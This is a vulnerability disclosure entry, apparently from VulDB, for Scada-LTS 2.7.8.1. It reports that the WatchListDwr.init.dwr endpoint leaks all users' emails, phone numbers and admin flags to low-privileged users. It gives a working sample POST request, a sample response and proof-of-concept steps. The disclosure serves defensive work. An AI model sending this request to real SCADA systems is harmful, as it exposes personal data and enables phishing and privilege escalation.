| Titre | SCADA-LTS Scada-LTS 2.7.8.1 Exposure of Private Personal Information to an Unauthorized Acto |
|---|
| Description | Sensitive User Information Disclosure via WatchListDwr.init.dwr Endpoint
Summary
A vulnerability was identified in the WatchListDwr.init.dwr endpoint of SCADA-LTS that allows any authenticated user, even with minimal permissions, to access sensitive user information including usernames, emails, phone numbers, and admin status. This flaw constitutes an Information Disclosure issue and could be used to facilitate further attacks such as phishing, privilege escalation, or social engineering.
Details
Vulnerable Endpoint: POST /Scada-LTS/dwr/call/plaincall/WatchListDwr.init.dwr
Authentication Required: Yes (low-privileged user)
Affected Parameter: N/A (static DWR call)
Impact Type: Information Disclosure
By issuing a crafted POST request to the vulnerable endpoint, a low-privileged user is able to retrieve detailed information of all users in the system. The backend responds with a full JavaScript object containing data such as usernames, emails, admin flags, and phone numbers.
Sample Request:
POST /Scada-LTS/dwr/call/plaincall/WatchListDwr.init.dwr HTTP/1.1
Host: kubernetes.docker.internal:8080
Content-Type: text/plain
callCount=1
page=/Scada-LTS/watch_list.shtm
httpSessionId=
scriptSessionId=XYZ123456789
c0-scriptName=WatchListDwr
c0-methodName=init
c0-id=0
batchId=1
Sample Response Snippet:
javascript
s7.admin=true;
s7.email="[email protected]";
s7.username="admin";
s8.admin=false;
s8.email="[email protected]";
s8.username="anonymous";
s11.admin=false;
s11.email="[email protected]";
s11.phone="13212313131";
s11.username="user1";
Proof of Concept (PoC)
Authenticate as any valid low-privileged user.
Send the above POST request to /Scada-LTS/dwr/call/plaincall/WatchListDwr.init.dwr.
Observe the server response containing sensitive information of all users in the SCADA system.
Impact
Privacy Violation: Emails, phone numbers, and usernames of all users, including administrators, are exposed.
Privilege Escalation Support: Knowledge of admin usernames and roles could be leveraged in further attacks.
Phishing and Social Engineering: Exposed contact information can be used to craft highly targeted attacks.
Reconnaissance: Attackers can map the user structure of the SCADA-LTS system for further exploitation.
References
SCADA-LTS – Official Repository
Discoverer
Natan Maia Morette
by CVE-Hunters |
|---|
| La source | ⚠️ https://github.com/CVE-Hunters/CVE/blob/main/Scada-LTS/Sensitive%20User%20Information%20Disclosure%20via%20WatchListDwr.init.dwr%20Endpoint.md |
|---|
| Utilisateur | nmmorette (UID 87361) |
|---|
| Soumission | 23/07/2025 01:18 (il y a 9 mois) |
|---|
| Modérer | 19/08/2025 07:39 (27 days later) |
|---|
| Statut | Accepté |
|---|
| Entrée VulDB | 320519 [Scada-LTS 2.7.8.1 WatchListDwr.init.dwr divulgation d'information] |
|---|
| Points | 20 |
|---|